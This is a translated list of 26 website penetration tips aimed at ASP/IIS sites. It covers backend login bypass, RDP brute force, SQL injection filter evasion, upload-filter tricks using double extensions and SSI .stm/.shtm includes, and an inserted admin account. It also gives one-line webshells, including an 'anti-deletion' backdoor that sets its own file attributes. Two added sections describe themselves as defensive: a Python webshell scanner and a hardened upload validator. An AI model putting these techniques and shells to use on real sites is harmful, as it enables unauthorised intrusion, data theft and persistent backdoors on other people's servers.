This article summarizes some frequently used website penetration techniques in the hope that they are useful to you.
1. On websites without strict filtering, bypass the backend login check by appending admin/session.asp or admin/left.asp to the site URL.
2. Some websites show a script prompt box in the backend. Enter "administrator" to get through! "Admin" indicates entering as an administrator.
3. Some websites have port 3389 open. Before the intrusion, first connect to 3389 and try weak passwords or brute force. In addition, press the Shift key five times to see whether a predecessor left a backdoor, and then try social-engineered passwords.
4. Sometimes a prompt box "Please log in" pops up in the backend. Copy the address (if it cannot be copied, place it in a web page source code analyzer), select browser - intercept jump check - view, and go to the backend!
5. Break through anti-leech (hotlink protection) to access the webshell. Code:
javascript:document.write("fuck")
Press enter and click GO to enter webshell.
6. Break through the "first-class information monitoring interception system". When a small Trojan ("pony") can be accessed and a larger Trojan uploaded, first merge the Trojan with an image and upload the merged image; then back up the database and access it!
7. When using the editor's shell, sometimes asp, asa, cer, php, aspx and other extensions are filtered out for uploading. In fact, you only need to write the extension as aaspsp to upload asp.
8. Sometimes you guess the table name but cannot guess the fields. Go to the backend, view the source file and search for the ID or type, then add the field in "Ah D" and guess the content to break through.
9. This technique can be used to social-engineer backend passwords. If the website domain name is www.hx95.com and the administrator name is hx95, try the passwords "hx95" and "www.hx95.com" to log in.
10. If the website filters "and 1=1" and "and 1=2" during manual injection, use "xor 1=1" and "xor 1=2" for the determination instead.
11. Construct a one-sentence Trojan locally and upload it. If the prompt "Select the file you want to upload first! [Re-upload]" is displayed, the file is too small. Open it in Notepad, add a few more words to enlarge the file, and upload it again.
12. When running the field names and the password phrase in the "Ah D" running table, the length displayed is 50 or more. If you cannot guess it, you can generally run it with Pangolin!
13. Tips for the administrator backend: admin/left.asp, admin/main.asp, admin/top.asp and admin/admin.asp display the menu navigation; use Thunder to download all the links.
14. Knowing the table name and fields, use an SQL statement to add a username and password to the ACCESS database:
Insert into admin(user,pwd)values('test','test')
15. When the administrator's password is obtained but the administrator's account is not known, open a news article on the front end and look for words such as "submitter" and "publisher". Generally, the "submitter" is the administrator's account.
16. Forcing ASP + IIS to reveal the absolute path of the website: assuming the site home page is http://www.xxxxx/index.asp/, submit http://www.xxxxx.cn/fkbhvv.aspx/, where fkbhvv.aspx does not exist.
17. Make use of the source code. Many websites use source code downloaded from the Internet, and some webmasters are very lazy and change nothing before uploading and activating the website. Download the same set: there is a lot of default information worth using.
18. Upload the following code to the webshell with the suffix asp. Even if someone else finds it, it cannot be deleted; this is a super anti-deletion Trojan, and you can leave a backdoor safely. Kitchen Knife connection password: x
- <%Eval(Request(chr(120))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if f.attributes<>39 then:f.attributes=39:end if%>
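A defender-side counterpart, added here and not part of the original article: a Python hunt over a web root for the signature of this one-liner (eval/execute on request input, a script that sets its own file attributes) and, on Windows, for script files carrying the ReadOnly+Hidden+System bits that make them look undeletable. The sample web root and its files are constructed inside the script.

```python
import os
import re
import tempfile

# Signatures of the one-liner shells quoted on this page (tips 18 and 23).
SHELL_PATTERNS = [re.compile(r"(eval|execute)\s*\(\s*request\s*\(", re.I)]
# FSO attribute tampering: 39 = ReadOnly(1) + Hidden(2) + System(4) + Archive(32).
ATTR_PATTERN = re.compile(r"\.attributes\s*=\s*\d+", re.I)
# Windows FILE_ATTRIBUTE_READONLY | HIDDEN | SYSTEM, as exposed by os.stat().st_file_attributes.
PROTECTED_BITS = 0x1 | 0x2 | 0x4
SCRIPT_EXT = {".asp", ".asa", ".cer", ".cdx", ".aspx", ".php", ".stm", ".shtm", ".shtml"}


def hunt_webshells(root):
    """Walk a web root; return sorted [(relative_path, [reasons])] for suspicious script files."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCRIPT_EXT:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            reasons = []
            if any(p.search(text) for p in SHELL_PATTERNS):
                reasons.append("eval/execute on request input")
            if ATTR_PATTERN.search(text):
                reasons.append("sets its own file attributes")
            # Only meaningful on Windows; elsewhere st_file_attributes is absent and this is 0.
            attrs = getattr(os.stat(path), "st_file_attributes", 0)
            if (attrs & PROTECTED_BITS) == PROTECTED_BITS:
                reasons.append("readonly+hidden+system attributes set")
            if reasons:
                findings.append((os.path.relpath(path, root), reasons))
    return sorted(findings)


def build_sample_root():
    """Constructed sample web root: a benign page plus a file carrying the tip-18 signature fragment."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "upload"))
    with open(os.path.join(root, "news.asp"), "w") as fh:
        fh.write('<% Response.Write("latest news") %>')
    with open(os.path.join(root, "upload", "x.asp"), "w") as fh:
        # Signature fragment only (no script delimiters), taken from the line quoted above.
        fh.write('Eval(Request(chr(120))):if f.attributes<>39 then:f.attributes=39:end if')
    return root


if __name__ == "__main__":
    for path, why in hunt_webshells(build_sample_root()):
        print(path, "->", "; ".join(why))
```

The "cannot be deleted" effect is only the attribute bits: clear them first (attrib -r -h -s on Windows) and the file removes normally.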
19. When the cracked account's password does not work in the backend, try connecting to FTP. For example, if the domain name is www.baidu.com and the obtained password is "bishi", try "xxxx", "xxxx.cn" or www.xxxx.cn as the FTP user name and "bishi" as the FTP password to log on. The success rate is very high! Default FTP port: 21. Default account and password: test
20. Can you log on when the verification code is not displayed in the backend? In fact, you can break through this by importing a piece of code into the registry. Save the following code as Code.reg and double-click to import it!
REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000
21. When the website does not allow uploading files such as asp, asa and php, upload an stm file with the code:
- <!--#include file="conn.asp"-->
(To view any other file, write that file name instead; here I suppose you want to view "conn.asp".)
Open the address of the stm file and check the source code. The code of "conn.asp" is displayed at a glance!
22. When the website does not allow uploading files of the ASP, CGI, CER, CDX, HTR and other types, try to upload a shtm file with the following content:
- <!--#include file="conn.asp"-->
If the upload succeeds, opening its address will show the content of conn.asp. In this way, the database path is ready!
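The upload checks that tips 6, 7, 21 and 22 defeat are a blocklist with substring stripping and a name-only check. As an added example that is not from the original article, here is the weak filter from tip 7 beside a hardened validator in Python that allowlists the final extension, rejects executable extensions anywhere in the name, and scans the bytes for SSI directives and server-side script tags (so an image with a shell merged into it is also refused); the extension sets are my assumption.

```python
import posixpath
import re

# Extensions IIS may execute or expand server-side, including the SSI types from tips 21 and 22.
EXECUTABLE_EXT = {"asp", "asa", "cer", "cdx", "htr", "aspx", "php", "cgi", "stm", "shtm", "shtml"}
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif", "pdf"}
# SSI directives (<!--#include ...-->) and ASP script tags inside the uploaded bytes.
SSI_DIRECTIVE = re.compile(rb"<!--\s*#\s*(include|exec|echo|config|set)\b", re.I)
SCRIPT_TAG = re.compile(rb"<%|<script[^>]*runat\s*=\s*[\"']?server", re.I)


def naive_sanitize(filename):
    """The weak filter tip 7 exploits: deleting "asp" once turns "x.aaspsp" back into "x.asp"."""
    return filename.replace("asp", "")


def validate_upload(filename, content):
    """Return (accepted, reason). Allowlist by extension and inspect the bytes; never blocklist."""
    base = posixpath.basename(filename.replace("\\", "/")).lower()
    parts = base.split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing extension"
    exts = parts[1:]
    if exts[-1] not in ALLOWED_EXT:
        return False, "extension not in allowlist: " + exts[-1]
    if any(e in EXECUTABLE_EXT for e in exts):
        return False, "executable extension inside name (double extension)"
    if SSI_DIRECTIVE.search(content):
        return False, "server-side include directive in content"
    if SCRIPT_TAG.search(content):
        return False, "server-side script tag in content"
    return True, "ok"


if __name__ == "__main__":
    # Constructed samples: the tip-7 name trick and the tip-21 SSI payload.
    print(naive_sanitize("shell.aaspsp"))
    print(validate_upload("shell.aaspsp", b"x"))
    print(validate_upload("page.stm", b'<!--#include file="conn.asp"-->'))
    print(validate_upload("photo.jpg", b"\xff\xd8\xff binary image data"))
```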
23. If "Your operations have been recorded!" is displayed while manually probing an injection point, check whether the file sqlin.asp exists. If it does, insert a Trojan after the injection point:
execute(request("TNT"))
Then connect to it with the Trojan client.
24. If I am not careful I may pick a site that does not support aspx. How to determine this? The method is very simple: append xxx.aspx to the website address. If a "Server Error in '/' Application: the resource cannot be found" page is returned rather than a plain 404 image, aspx Trojans are supported.
25. You can view the PHP version by appending test.php to the website address.
26. The two website backend files admin_index.asp and manage_login.asp are forbidden.